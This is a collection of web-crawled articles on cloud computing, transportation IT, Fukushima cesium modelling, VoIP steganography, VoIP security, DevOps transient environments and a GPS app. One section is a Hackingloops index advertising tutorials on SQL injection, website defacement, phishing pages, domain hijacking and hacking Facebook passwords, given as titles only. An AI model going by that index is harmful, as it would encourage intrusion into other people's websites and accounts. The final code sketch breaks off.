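grid = {"A": {"B": 2, "C": 3}, "B": {"D": 2}, "C": {"D": 3}}
```

With the main road open, the planner picks A-B-D; block the A-B stretch and it reroutes through the inner streets, exactly the gridlock escape the article describes.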
Finally, roads may no longer be a headache for drivers if driverless vehicles catch on. California-based manufacturers are now testing them on public routes. The premise behind their possible mass use is that they will ease traffic by keeping pace with one another, avoiding the overlapping maneuvers human drivers cause. They may even overcome speeding, long waits at termini, and the other habits of modern driving that give passengers migraines. Their sophisticated road-smart technologies will let them book appointments with passengers and drive at an optimal speed.
If 'infrastructure' ever returns to its original meaning, namely the road network, it will be courtesy of breakthroughs in cloud computing. That will only come to pass, however, if the WHO prediction that monthly accident figures worldwide will reach one hundred and fifty thousand by 2020 does not become reality, and when mileage and carrier information is documented as comprehensively around the world as it currently is in the United States.
By John Omwamba | <urn:uuid:10293297-6f6f-4cfb-95b0-5bb9423da907> | CC-MAIN-2017-09 | https://cloudtweaks.com/2013/04/cloud-computing-may-fast-track-road-operability/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00618-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951611 | 702 | 2.890625 | 3 |
Kitamura A. (Japan Atomic Energy Agency; Geological Isolation Research and Development Directorate), Kurikami H. (Japan Atomic Energy Agency; Geological Isolation Research and Development Directorate), and 21 more authors.
Nuclear Science and Engineering | Year: 2015
Significant amounts of radioactive materials were released to the atmosphere from the Fukushima Daiichi nuclear power plant after the accident caused by the major earthquake and devastating tsunami on March 11, 2011. Accurate and efficient prediction of the distribution and fate of the radioactive materials eventually deposited at the surface in the Fukushima area is of primary importance. In order to make such a prediction, it is important to gather information regarding the main migration pathways for radioactive materials in the environment and the time dependences of radioactive material transport over the long term. The radionuclide of most concern in the Fukushima case is radioactive cesium. Previous surveys indicate that the primary transport mechanisms for cesium are either soil erosion and water transport of sediment-sorbed contaminants or transport of dissolved cesium in the water drainage system, such as by rivers. A number of mathematical models of radioactive contaminants, with particular attention paid to radiocesium, on the land and in rivers, reservoirs, and estuaries in the Fukushima area have been developed. Simulation results are examined while field investigations are implemented simultaneously. For example, the radiocesium concentration on the flood plain of the Ukedo River was of order 10^5 Bq/kg in both the model prediction and the field investigation results. Microscopic studies of the adsorption/desorption mechanism between cesium and soils have been performed to shed light on the mechanisms of macroscopic diffusive transport of radiocesium through soil. The maximum exchange energy between cesium and preheated potassium in the frayed edge site was simulated to be 27 kJ/mol, which reproduces the corresponding value previously obtained by experiments. These predictions will be utilized for assessment of dose from the environmental contamination and for proposed countermeasures to limit dispersion of the contaminants.
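To put the reported 27 kJ/mol in perspective: an exchange free energy of that magnitude implies a strongly cesium-selective site, since the equilibrium (selectivity) constant follows from K = exp(-ΔG/RT). The sketch below treats 27 kJ/mol as the magnitude of a favorable ΔG at room temperature; both the sign convention and the temperature are assumptions for illustration, not stated in the abstract:

```python
import math

R = 8.314  # J/(mol*K), gas constant

def selectivity_constant(delta_g_kj_per_mol, temp_k=298.15):
    """Equilibrium constant implied by an exchange free energy,
    K = exp(-dG/RT); dG is negative for a favorable exchange."""
    return math.exp(-delta_g_kj_per_mol * 1000 / (R * temp_k))

# -27 kJ/mol at 25 C gives K on the order of 10^4 to 10^5,
# i.e. the frayed edge site strongly prefers cesium over potassium
k = selectivity_constant(-27)
```

Order-of-magnitude numbers like this are why cesium stays so tightly sorbed to clay minerals in the macroscopic transport models.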
When it comes to transportation, the United States is No. 1. We have more miles of highway and railroad, we drive more miles in our vehicles, and we fly more passengers in our airplanes than any other country in the world.
The transportation market is a $600 billion industry, according to BizStats.com, with the public sector contributing vast sums. For example, in 2005, the Census Bureau reported that federal, state and local governments spent $66 billion on roads. And according to the American Public Transportation Association, public transportation is a $27 billion industry.
Also in 2005, state and local governments spent $1.8 billion on transportation IT systems, according to INPUT. By 2009, IT spending will have increased to $2.5 billion. Meanwhile the federal government has proposed spending $2.7 billion on transportation-related IT projects in fiscal 2007.
While it's hard to envision the vast number of IT projects taking place in the transportation industry, it is even harder to imagine an overall strategy for sharing data between the various levels of government. Repeated requests to the U.S. Department of Transportation's Office of the CIO for an overview of its data sharing strategy went unanswered.
But in reality, a lot of sharing is going on. Many agencies at the federal, state and local levels are working on individual projects to integrate information at different levels of government, or across jurisdictions at the same level. They are also working to improve data sharing between transportation and law enforcement, as well as between environmental protection and other disciplines.
Data on Changing Conditions
As acting strategy manager for the government practice at SAS, a business analytics software firm, Alyssa Alexander works with many transportation departments. She observed that state departments of transportation (DOTs) are increasingly sharing data on road conditions through statewide geographic information councils and plotting the data into map displays. The GIS shop can code the maps to indicate where the roads are in the best and worst condition due to construction projects. The DOTs also analyze stretches of highway to predict which are likely to see more accidents because of construction.
"They're making sure public safety officers are aware of changes in road conditions so that they're able to respond quickly to traffic incidents if there's a higher likelihood," Alexander said, adding that the DOTs are trying to develop better mechanisms for routing this road condition data through their GIS departments and to the public safety departments.
Safety research -- particularly concerning incident tracking -- is one of the priorities in transportation data sharing, according to Alexander.
State departments of public safety normally collect incident-related data. "They must communicate the appropriate data points into the department of transportation, so that at a planning level, the department of transportation can improve the safety of a particular intersection or the speed along the roadway," she said.
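At the planning level, the screening described here is often a rate computation: incidents normalized by traffic volume, so that a lightly traveled but crash-prone intersection outranks a busy one with more raw crashes. A toy sketch (location names, counts, and volumes are all invented):

```python
def rank_hazardous_locations(incidents, traffic_volumes):
    """Rank locations by incidents per million vehicles, a common
    screening measure. Inputs are dicts keyed by location."""
    rates = {
        loc: incidents[loc] / traffic_volumes[loc] * 1_000_000
        for loc in incidents
    }
    return sorted(rates.items(), key=lambda kv: kv[1], reverse=True)

# Intersection B has fewer crashes than A but a far higher crash rate
ranking = rank_hazardous_locations(
    {"A": 30, "B": 12},          # crashes per year
    {"A": 5_000_000, "B": 400_000},  # vehicles per year
)
```

Real DOT screening adds severity weighting and statistical adjustment, but the data-sharing point stands: the rate cannot be computed unless public safety's incident counts reach the DOT that holds the volume data.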
SAS has been working with clients on systems for collecting incident data, as well as Web presentations, Alexander said. "The Web sites that provide this information through static reports or ad hoc queries are the ones we see a lot more of. They're in development, and there's some grant funding from the Federal Highway Administration (FHWA) to support those types of programs."
Efforts to share incident data, and many other data sharing initiatives, could get a major boost from a program to develop sets of Extensible Markup Language (XML) schemas for transportation. Government and industry participants recently completed a project, funded by the National Cooperative Highway Research Program (which is sponsored by state DOTs and the FHWA), to define TransXML data exchange formats for applications in four areas: survey/roadway design, transportation construction/materials, highway bridge structures, and transportation safety.
Participants hope the TransXML framework will eventually cover many more disciplines. "They have planned interfaces for public safety, rail, local transit, ferries, accounting and aerospace applications," Alexander said.
TransXML is intended to be a one-stop shopping umbrella that covers the transportation industry, said Steve Brown, applications development manager at the Nebraska Department of Roads (NDOR)."But it's still in its infancy." A self-proclaimed "data sharing/XML evangelist," Brown serves on the technical applications architecture task force of the American Association of State Highway and Transportation Officials -- a committee that played a major role in writing the project's proposal.
Like any XML framework, TransXML provides a way to exchange data among different software applications, even those not designed to be interoperable. With schemas already in place for exchanging data on transportation safety, local law enforcement agencies using a variety of systems to record data on highway crashes could easily submit that information to a state transportation department. "We can then keep it centrally, so we can do our hazardous location analysis, safety analysis, and then make that available -- all of our data -- back to the local law enforcement if they're interested in utilizing it," Brown said. The state could also send the collected data to federal agencies without worrying about data format requirements.
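The mechanics of such an exchange are plain XML processing. The element names below are invented for illustration (the real TransXML safety schemas define their own), but the pattern is the point: one agency serializes a crash record, another parses it, without either caring what software the other runs:

```python
import xml.etree.ElementTree as ET

def crash_record_xml(crash_id, route, milepost, severity):
    """Serialize one crash record as XML. Element names are
    hypothetical stand-ins for a TransXML safety schema."""
    crash = ET.Element("CrashRecord", id=str(crash_id))
    ET.SubElement(crash, "Route").text = route
    ET.SubElement(crash, "Milepost").text = str(milepost)
    ET.SubElement(crash, "Severity").text = severity
    return ET.tostring(crash, encoding="unicode")

def parse_crash_record(xml_text):
    """What the receiving DOT does: parse the record, regardless
    of which vendor's system produced it."""
    crash = ET.fromstring(xml_text)
    return {
        "id": crash.get("id"),
        "route": crash.findtext("Route"),
        "milepost": float(crash.findtext("Milepost")),
        "severity": crash.findtext("Severity"),
    }
```

Schema validation (checking a record against the published XSD) is the other half of the story, omitted here for brevity.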
Hopefully, Brown said, officials at the NDOR will start using TransXML in the next 18 months.
Some other applications for TransXML will have to wait until more schemas are developed. Local governments could use it to store information about tax lots and landowners, and submit it to the states. "We can use it when we buy right of way, when we permit, when we do access control," Brown said. "Then all that information can be submitted nationally, hopefully, for census and other land management uses."
In long-haul trucking, TransXML could streamline the process of obtaining oversized/overweight permits. Today, if a truck needs to haul an oversized or overweight load across several states, the trucking company or its agent must apply separately to each state the load will cross. With TransXML formats, the company could apply once and then submit that one application to each state, paying the necessary fees and getting the permits in one transaction, Brown said.
TransXML could also help governments cooperating on cross-border highway facilities. When Nebraska works with Iowa or South Dakota on a road with a cross-border bridge, Brown said, road and bridge design is a collaborative and cooperative effort using their respective systems. Using TransXML, the states can create a single transportation system model, "even though it's designed with different software, with different teams, with different people."
The same principle applies when the state builds a highway that crosses city or county lines, he said.
While the group has achieved its goal of developing and demonstrating TransXML schemas in the four defined areas, as of March it had still not completed one important task -- finding an organization to take long-term ownership of TransXML and keep the initiative going. "If there is no long-term owner and keeper, it falls apart," Brown said.
Road Maps and GIS Intersect
Many data sharing arrangements that involve transportation focus on GIS. The Tucson, Ariz., DOT (TDOT) has been exchanging GIS files with Pima County and other members of the Pima Association of Governments since the 1990s.
Transportation agencies started by making a variety of digital maps on their Web sites available to anyone in the public or private sectors. Local governments also continue to share data via TDOT's maps and records server. "We pass orthophotography around like it was candy," said Ron Platt, IT manager of the TDOT. Since all the participants use GIS software from ESRI of Redlands, Calif., there are no compatibility issues, he said.
One county project that uses GIS data from TDOT is the Sonoran Desert Conservation plan, a land-use planning project to protect the desert's habitat. Many of the washes -- stream beds that contain no water -- have been digitized off the orthophotography and shared with the county, Platt said.
GIS is also the focus of a project in the state of Washington that will involve data integration with other departments. The effort comes as part of a project to replace many of the critical information management systems at the Washington State DOT (WSDOT). The plan is to tie the new systems -- for managing highway construction, finance and a host of other activities -- to the WSDOT's GIS tools, and add a geographic dimension to the information.
"When you're trying to make a decision on what investments have been made or need to be made in an area, you can call up everything from engineering drawings to financials" connected with any project on the map, said David Hamrick, WSDOT's CIO. The agency plans to include data layers provided by the state Department of Natural Resources and other departments that own assets across the state, he said.
In another sharing initiative, Washington state is working with Oregon and local governments within the two states on a Web-based trip planning system, which Hamrick described as almost like a MapQuest for public transportation. When the system is complete, "you can go in and say, 'I need to get from Spokane to this address in Portland,' and it will map all the possible public transportation methods you can use to get there," he said.
Each transportation authority will continue to maintain its own schedule data. Initially authorities will have to periodically upload fresh schedules to keep the integrated system up to date. "In a future phase, we'll start looking at connections to be able to just automatically update from local systems," Hamrick said.
Commercial Drivers, Problem Drivers
For years, state motor vehicle departments have shared data on commercial drivers through the Commercial Driver License Information System (CDLIS), operated by the American Association of Motor Vehicle Administrators. Each state maintains CDL data in its own management system, and the CDLIS operates as a "pointer system," said Barry Goleman, specialist leader for the transportation and motor vehicle practice at Deloitte Consulting in Sacramento, Calif. When an employee at a DMV in one state makes a query about a commercial driver, the system can see who has licensed that driver and route the request to that state.
If a truck driver from Florida applies for a CDL in New York, for example, the DMV will query the system to make sure the license is on record in Florida, and that the driver has only one license record, Goleman said. When New York issues the license, the record is electronically transferred to Florida. "And if that driver subsequently gets a traffic conviction in Illinois, after that conviction is processed, Illinois electronically routes that to New York for posting on his home state driver record," he said.
The U.S. DOT's National Highway Traffic Safety Administration operates a parallel system for noncommercial drivers' licenses. Called the National Driver Register (NDR), it allows motor vehicle officials in one state to check DMV databases in other states before issuing new licenses, Goleman said.
"That prevents somebody who has a Maryland license and gets suspended for drunken driving from going across the border to Virginia and saying, "'I've never had a license before; I want to get a license here; I've just moved here,'" Goleman said. Like the CDLIS, the NDR uses a federated data system; each state maintains its own data, but other states' DMVs can access the information as needed.
Other transportation agencies also query the NDR to obtain driver license data for activities that they regulate: the Federal Aviation Administration for airman medical certification; the Federal Railroad Administration for locomotive operators; the Coast Guard for merchant marines and servicemen; and the National Transportation Safety Board and Federal Motor Carrier Safety Administration for accident investigations.
Had the system been available in 1989, it might have averted the Exxon Valdez disaster, Goleman said. The oil tanker's captain, Joseph Hazelwood, had been arrested several times for drunken driving. "They check all their maritime certificates against this database to look for people who have a history of those kinds of convictions." | <urn:uuid:30b07ce3-5caf-4ddf-8e20-2d558132c553> | CC-MAIN-2017-09 | http://www.govtech.com/featured/The-Integration-Highway.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00318-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94914 | 2,452 | 2.578125 | 3 |
A group of researchers from the Institute of Telecommunications at the Warsaw University of Technology has devised a relatively simple way of hiding information within the VoIP packets exchanged during a phone conversation.
They called the method TranSteg, and they have proved its effectiveness with a proof-of-concept implementation that allowed them to send 2.2 MB (in each direction) during a 9-minute call.
IP telephony allows users to make phone calls through data networks that use an IP protocol. The actual conversation consists of two audio streams, and the Real-Time Transport Protocol (RTP) is used to transport the voice data required for the communication to succeed.
But RTP can transport different kinds of data, and the TranSteg method takes advantage of this fact.
“Typically, in steganographic communication it is advised for covert data to be compressed in order to limit its size. In TranSteg it is the overt data that is compressed to make space for the steganogram,” explain the researchers. “The main innovation of TranSteg is to, for a chosen voice stream, find a codec that will result in a similar voice quality but smaller voice payload size than the originally selected.”
In fact, this same approach can, in theory, be used successfully with video streaming and other services where it is possible to compress the overt data without significantly degrading its quality.
To send data undetected through a VoIP conversation, both the sending and receiving machines must be configured in advance, so that packets marked as carrying payload encoded with one codec are understood to actually carry voice encoded with another codec, one that compresses the audio more efficiently and leaves space for the steganographic message.
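The arithmetic behind a figure like 2.2 MB is straightforward. If a stream labeled as carrying a 64 kbit/s payload (G.711) is actually re-encoded at, say, 32 kbit/s, half of every voice payload is freed for covert data. The specific codec pair here is an assumption chosen for illustration; the researchers report only the measured total:

```python
def transteg_capacity_bytes(overt_kbps, covert_codec_kbps, call_seconds):
    """Bytes of covert data per direction when payloads declared as
    an overt_kbps codec actually carry covert_codec_kbps of voice;
    the difference is free space for the steganogram."""
    freed_kbps = overt_kbps - covert_codec_kbps
    return freed_kbps * 1000 / 8 * call_seconds

# 64 kbit/s payload re-encoded at 32 kbit/s over a 9-minute call:
# about 2.16 MB each direction, consistent with the reported 2.2 MB
capacity = transteg_capacity_bytes(64, 32, 9 * 60)
```

The trade-off is audible: the more aggressive the covert codec, the larger the steganogram but the greater the risk that degraded voice quality gives the channel away.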
The method sends and receives data efficiently, but to be considered good enough to use, it must also be undetectable by outside observers.
According to the paper, the first goal can be accomplished whether VoIP phones or intermediate network nodes are used by either or both participants in the conversation, but the second only if two VoIP phones are the sending and receiving nodes, since in that case the format of the voice payloads does not change as they traverse the network.
What Is Cloud Computing
What is cloud computing, you ask? The concept may seem nebulous or hard to decipher, but in reality it is very simple and compelling. It provides a cost-effective solution, especially for IT professionals, who can now reap the benefits of cloud computing without spending exorbitant amounts of cash on software, hardware, and other services. Before the advent of the cloud computing concept, traditional business structures faced exactly these problems, since the services mentioned above had to be delivered to each member of the team. The whole process was complicated, painstakingly tedious, and placed a huge burden on financial resources. Applications then had to be configured and maintained to ensure that the system ran smoothly and everyone had flawless, uninterrupted access to the services.
Cloud Computing Definition
Cloud computing eliminates all these issues and delivers a viable alternative that allows businesses to use the Internet as a backbone to provide applications and handle the flow of data. Vendors deploy central servers that manage services and troubleshoot software upgrades. These servers and data storage units are the basic components of the cloud, where these services are administered. The protocols implemented in these servers are usually called middleware; they ensure that all the computers present in the network can communicate with each other and that services are provided throughout the model. Users can then access these services simply by going online and logging in to their account, which exists on the central server, and engage in their tasks without having to install any software or service on their personal machines. This is highly efficient, since all the memory and processing is centralized instead of localized. The workload of the whole model also becomes centralized, which reduces the dependency on local machines for running applications and services. The user becomes mobile and can use any workstation with a working Internet connection to gain admission to the network.
Since a cloud computing network will potentially handle an abundance of users, it also has the capability to provide sufficient storage space for the data that needs to be saved. It saves physical space as well, since the stored data lives in the cloud rather than on drives or local servers that take up room in offices. Redundancy is also often put into practice as standard functionality. This provides a backup of the data stored, so that in case of a server crash, vital user information is preserved and remains intact.
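Redundancy of this sort is easy to picture as replicated writes: every save goes to several servers, so losing any one of them leaves the data intact. A toy sketch (real cloud stores add quorums, repair, and consistency protocols on top of this idea):

```python
class ReplicatedStore:
    """Toy cloud storage with N-way redundancy: writes go to every
    replica; reads succeed as long as any replica survives."""
    def __init__(self, replicas=3):
        self.replicas = [{} for _ in range(replicas)]

    def put(self, key, value):
        for replica in self.replicas:
            replica[key] = value

    def crash(self, index):
        self.replicas[index] = None  # simulate one server failing

    def get(self, key):
        for replica in self.replicas:
            if replica is not None and key in replica:
                return replica[key]
        raise KeyError(key)

store = ReplicatedStore(replicas=3)
store.put("report.doc", "vital user information")
store.crash(0)
# The data survives the crash: two replicas still hold it
```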
Next Week – Part 2: Community, Private, Public, Hybrid Clouds…
By Chuck Weaver | <urn:uuid:85560f06-713d-4d1e-a46b-4c6f8409f16c> | CC-MAIN-2017-09 | https://cloudtweaks.com/2011/11/what-is-cloud-computing-yes-another-perspective-part-1/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00018-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.960883 | 487 | 3.28125 | 3 |
Critics of Voice over Internet Protocol (VoIP) cite a lack of security in VoIP programs. With recent advancements in the telecommunications industry, however, this is a claim of the past. Every VoIP system can be individually customized to a company's security requirements. The main security issues with VoIP surround a company's implementation of the system, not the system itself: if traditional network security is applied to a business VoIP system, VoIP is as secure as any other protocol on the market.

When VoIP was originally introduced to the public, hacking and security were not at the forefront of developers' minds. As with any technology product, years of consumer use and research have produced a far more advanced product than what was originally released. And as with all products, the more popularity they gain, the more scrutiny they attract. Many security issues can be resolved simply by removing the code for unused VoIP features and performing regular security audits on commonly used ones.

Most importantly, companies need to define their security requirements ahead of time. Financial institutions and government agencies have higher confidentiality requirements and may need additional, advanced encryption. Implementing the proper tools before switching to hosted VoIP helps companies assess all costs up front and guard against cyber attacks. Some technology experts adamantly maintain that business VoIP systems are in fact more secure than traditional telephone systems, because IP systems can add layers of security that traditional telephone systems cannot. In their view, VoIP becomes vulnerable only when companies neglect to install proper security and IP safety protocols.
VoIP services provide a constantly available dial tone, offering consistent reliability for receiving and making calls to customers and clients. One of the top VoIP security threats arises when a company neglects to turn on internet security because it seems overly complicated, and never takes the time to ensure its system is adequately protected. Companies switch to VoIP because integrating data and voice onto one network helps decrease operating expenses and boost productivity in ways that traditional telecommunication services cannot. As with all popular products, the more people use them, the more security risks they face from attackers. Taking the proper security measures can eliminate these threats, allowing companies to take full advantage of modern VoIP features and systems.
In economics, scarcity is the fundamental problem of "having humans [with]... unlimited wants and needs in a world of limited resources" (see Resources). When resources are scarce, people compete for access to them. Competition for resources is evident when it comes to people getting access to environments on traditional software projects.
The beauty is that thanks to hardware commoditization, virtualization, and cloud computing, this competition can be greatly diminished when the appropriate patterns and practices — such as transient environments — are used on a project. Transient environments are short-lived environments that are terminated on a frequent basis. To be clear, the scarcity never vanishes, but you experience the illusion of infinite capacity. When applying the transient environment pattern, you'll start forgetting that it's even an illusion.
Sometimes, you'll hear these types of environments referred to by other names, including ephemeral, temporal, temporary, and disposable. These all mean essentially the same thing — that nonproduction environments are as short-lived as possible. Lately, my company has been recommending that they last no more than 72 hours — and that's on the high end.
One of the more challenging problems in software development occurs when teams have fixed instances that no one else can alter. Often, this happens because the environment took days, weeks, or months to configure. This is an antipattern that occurs because no one took the time to script the creation of the environment. Thus, environments are scarce resources, and the competition for them is fierce. When environment lease policies do exist, they are often ignored, or the lease deadlines are extended multiple times.
Most projects I've seen don't have environment lease policies — or they are very loosely defined and often violated. For the ones that do have lease policies, environments require the manual installation of tools, data, and configuration — after the environment has been created. This makes each and every environment unique and, therefore, more difficult to manage, because hundreds of environments might get provisioned on larger enterprise projects. In that case, there's no simple approach to getting back to a baseline for the environment. Moreover, no team member knows how to get it back to that baseline state. As a result, team members become reluctant to terminate — or even modify — these environments. This antipattern makes it prohibitively more expensive to create and terminate environments.
With transient environments, all environments are ephemeral except for production (although there are effective ways to make production environments ephemeral too). Although this might vary by project, the heuristic is that these environments exist for only enough time to run through a suite of automated and exploratory tests. The key prerequisite for transient environments is that they be scripted, tested, and versioned. Ideally, you should be using an infrastructure automation tool such as those I discuss in "Agile DevOps: Infrastructure automation."
The key features that make up transient environments are:
- Scripted environments: They are fully scripted, versioned, and tested.
- Self-service environments: Any authorized person on the team can launch a new environment.
- Automatic termination: Environments are automatically terminated based on the team policy. Team members have no option to override the policy.
Once you have a fully scripted environment, you can enable authorized team members to obtain it in a self-service manner. With the freedom to simply launch and terminate environments on demand comes responsibility. This responsibility is reinforced by defining termination policies and enforcing those policies through automated processes that terminate the environments on a regular basis. (I will cover test-driven infrastructures and versioning in future articles in this series).
By defining transient-environment policies and automating the implementation of those policies on your projects, you can reduce the proliferation of unique environments, support self-service deployments, increase automation of environment instantiation, move toward a culture of environments as commodities, allow for test isolation, and significantly reduce the amount of troubleshooting in environment-specific problems. Some of the key benefits are:
- Reduce environment dependency: Reduce the dependency that your team has on any one particular environment by providing the capability to launch and terminate them at will.
- Better resource utilization: By terminating environments that are no longer being used, you free up capacity for others.
- Knowledge transfer: When team members know that their environments will be terminated at specific times, automation becomes the only practical way to preserve the institutional knowledge of how the environment gets configured.
How it works
The nice thing about transient environments is that it's a rather simple pattern to implement once your environments are fully scripted, versioned, and tested. At that point, you have three primary tasks to perform:
- Create a team policy: In collaboration with your team members, determine your team policy based on your project requirements. I recommend starting aggressively and regularly reducing the number of hours these environments live — to about 72 hours.
- Automate environment termination: Write a script that terminates all environments that exceed the team lease policies.
- Schedule environment termination: Schedule a process to run on a regular basis that executes the environment-termination script.
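The termination script from step 2 can be sketched in a few lines of Python. Everything below is hypothetical (the catalog, names, and dates are made up, and a real script would fetch launch times from the cloud provider's API), but it shows the lease-policy logic:

```python
from datetime import datetime, timedelta

LEASE = timedelta(hours=72)  # the team's lease policy

def expired_environments(catalog, now):
    """Return the names of environments whose lease has run out.

    catalog maps environment name -> launch time (datetime).
    """
    return [name for name, launched in catalog.items()
            if now - launched > LEASE]

# Hypothetical catalog; a real script would fetch launch times
# from the cloud provider's API instead.
catalog = {
    "feature-login": datetime(2012, 9, 1, 8, 0),
    "perf-test":     datetime(2012, 9, 4, 9, 30),
}
now = datetime(2012, 9, 4, 12, 0)
print(expired_environments(catalog, now))  # ['feature-login']
```

Passing `now` in as a parameter (rather than reading the clock inside the function) keeps the policy check deterministic and easy to test.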
Base your team policy on the time it takes to run through all of the required testing.
To schedule environment termination, you can start by using a scheduler such as cron or — if you're using Java — Quartz (see Resources). You can also use the scheduler provided by your Continuous Integration server to run a job at a regular time every day. This example shows a simple crontab entry that runs a script once a day at 2:15 a.m.:

15 02 * * * /usr/bin/delete_envs.sh
The next example uses the command-line interface provided by Amazon Web Services (AWS) CloudFormation to terminate an environment as defined by a CloudFormation stack:
/opt/aws/apitools/cfn/bin/cfn-delete-stack --access-key-id $AWS_ACCESS_KEY \ --secret-key $AWS_SECRET_ACCESS_KEY --stack-name $current_stack_name --force
A script like this can be expanded to loop through an environment catalog and terminate all associated resources.
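Such a loop might look like the following hypothetical sketch, which builds one cfn-delete-stack command per entry in an environment catalog; a real script would execute each command rather than just printing it:

```python
CFN_DELETE = "/opt/aws/apitools/cfn/bin/cfn-delete-stack"

def delete_commands(stack_names):
    """Build one termination command per stack in the catalog."""
    return [
        f"{CFN_DELETE} --access-key-id $AWS_ACCESS_KEY "
        f"--secret-key $AWS_SECRET_ACCESS_KEY --stack-name {name} --force"
        for name in stack_names
    ]

# Hypothetical catalog of stacks whose leases have expired.
for cmd in delete_commands(["feature-login", "perf-test"]):
    print(cmd)
```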
By defining an aggressive team policy, scheduling a process, and automating the termination of environments, your team can proactively manage resources and reduce the chance that environments the project relies upon exist for weeks or months.
How does environment troubleshooting usually work on most projects? In my experience, it's a painful slog of determining what got changed, who changed it, and why. Often, several people investigate the problem to determine the proper remedy. The problem is often replicated because each environment is unique — because unique modifications are made to it as it runs for weeks or months.
Alternatively, with a transient-environment policy — based upon scripted, versioned, and tested environments — you get the environment into a known state. To do this, you launch a new environment and apply changes to determine its effect. Then, you write automated tests and scripts and then version the changes. Because effective change management is in place, you can always get back to a known state to make changes, rather than wasting hours or days determining what got changed in a dynamic environment modified by myriad users. This is the essence of having a canonical environment.
A transitory stay
In this article, you learned that agile DevOps environments are as short-lived as possible — as little as a few hours and as much as a few days. By defining a policy and scheduling automated termination of environments, you reduce the dependency on a limited number of unique environments, better utilize resources, and encourage automation so that environments can be launched and terminated on demand.
In the next Agile DevOps installment, you'll learn about creating an environment that fails constantly — paradoxically, for the purpose of preventing failure. In it, I'll cover Chaos Monkey, a tool developed by the Netflix tech team that intentionally and randomly, but regularly, terminates instances in the Netflix production infrastructure to ensure that the systems continue to operate in the event of failure.
- Scarcity: Wikipedia describes economic scarcity.
- "Automation for the people: Deployment-automation patterns, Part 2" (Paul Duvall, developerWorks, February 2009): Read about the "Disposable Container" pattern for deployments.
- "Servers fail, who cares?": Gregg Ulrich of Netflix describes how Netflix doesn't rely on any one environment to stay running.
Get products and technologies
- Quartz: Quartz is an open source job-scheduling service.
- IBM Tivoli® Provisioning Manager: Tivoli Provisioning Manager enables a dynamic infrastructure by automating the management of physical servers, virtual servers, software, storage, and networks.
- IBM Tivoli System Automation for Multiplatforms: Tivoli System Automation for Multiplatforms provides high availability and automation for enterprise-wide applications and IT services.
Website hacking means altering or manipulating a website's content or database: tampering with its CSS or JavaScript, leaking its user database, corrupting its database, defacing its index page, exploiting anonymous logins, and much more. Hacking websites has nowadays become something of a fashion among hackers, who deface index pages to display their own custom pages, mostly for notoriety. Several techniques are involved in achieving the goals above: injection attacks (SQL injection, command injection, local file inclusion, XPath injection, arc injection), cross-site scripting attacks, cross-site request forgery attacks, header manipulation, attacks on root directories, registration bypasses, unblocking restricted websites, hijacking premium accounts, cookie-based attacks, domain hijacking, and more.
Hackingloops has collected below all of the website hacking articles posted on Hackingloops to date, so you can learn how websites get hacked.
Website Hacking Articles:
- 10 step guide to prevent SQL injection
- Hacking websites SQL injection tutorial
- 6 Ways to Hack or deface Websites Online
- Advanced Persistant Threat Analysis with Network traffic Analysis
- Hack websites using Command Injection
- Hacking Websites using SQLMAP | HackingLoops Tutorials
- Hacking websites using Directory Traversal Attacks | Hackingloops
- How to Hack Facebook account or password
- How to access blocked sites or country restricted sites
- How to bypass registration on forums to view content
- How to hack facebook account password Hackingloops
- How to make a Phisher or Fake Pages
- Unblock torrent websites in India on Airtel | MTNL
- XPath Injection Tutorial to Hack Websites Database
- How to Deface Websites using SQL and Php scripting?
- How to hack a Website or websites database
- How to hack websites by Remote File Inclusion
- SQL Injection tutorial to Hack websites
- Domain Hijacking – How to Hijack Domain Names
- How to Hack Cyberoam 100% working hack
- The Null Byte Hack : Extreme Hack for sites which have avatar and picture uploading facility.
Juniper app works to correct GPS errors
- By John Breeden II
- Oct 03, 2013
Government workers who frequently use GPS applications know both their strengths and limitations. While the system is accurate down to about two or three meters, sometimes that isn't good enough. And when natural or manmade structures skew the signal, readings can tend to drift off course even more.
Juniper Systems, which makes rugged GPS devices aimed at the professional and government markets, has created a free Global Navigation Satellite System app that works with its rugged Mesa Geo notepad to analyze and compensate for most GPS errors.
"Large trees or buildings can change the signal" of most GPS devices, said Katelyn Heiner, a marketing specialist for Juniper. When the device tries to compensate for changing signals, that can lead to errors, she said.
The Juniper app lets users tell their devices what kind of activity they are performing, which prompts the GPS receiver to try to figure out the user's actual position when a signal is corrupted by objects. One setting, for example, works best for people who are walking with their devices – the system will assume a very low acceleration, so it won't indicate that people are farther away from the last known location than they could reasonably walk. Another mode is for use in a vehicle, which can use some dead-reckoning technology to estimate positions that might be quite a distance horizontally from where the user started out, but probably about the same spot vertically. There is even an At Sea mode that assumes no vertical change in position but allows for quite a lot of horizontal movement.
Probably one of the most useful modes introduced by the app is called Static Hold. Users would choose this setting when they are planning to stand still for a long period of time, or if the device itself is placed in one spot. It sets the navigation algorithm's velocity to zero along both the horizontal and vertical axis, and it will remain stable until evidence of movement is detected.
Natural resources marketing manager Trevor Brown helped create the app for Juniper and tested it extensively in the field. "Juniper does a lot of work creating hardware that minimizes noise and allows users to get a better signal," he said. "What we've done with this app is to also let the software help make things more accurate."
Brown said that using a GPS is a dynamic process, in which up to eight satellites can be sending data to receivers. Interpreting all those signals is what makes a GPS device accurate to within, say, two meters or four meters. But when a signal bounces off trees or has to pass through buildings, it can become slightly corrupted, and the device can misinterpret its location.
"Where this actually becomes important is when people are using a GPS in a non-optimized environment," he said, which is anything other than a totally open sky. "What the software does is to eliminate outliers it gets in the data based on what users are doing. So if they are just walking with their device and a signal comes in that's 12 meters away from the others, it will discount that when it estimates its position."
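The outlier rejection Brown describes can be illustrated with a short sketch. This is not Juniper's actual algorithm, just a hypothetical filter that discards any fix implying a faster-than-walking speed relative to the last accepted position:

```python
import math

MAX_WALK_SPEED = 2.0  # meters/second; assumed ceiling for walking mode

def filter_fixes(fixes):
    """Drop GPS fixes that imply impossible movement between samples.

    fixes is a list of (t_seconds, x_meters, y_meters) tuples.
    """
    accepted = [fixes[0]]
    for t, x, y in fixes[1:]:
        t0, x0, y0 = accepted[-1]
        dist = math.hypot(x - x0, y - y0)
        if dist <= MAX_WALK_SPEED * (t - t0):
            accepted.append((t, x, y))
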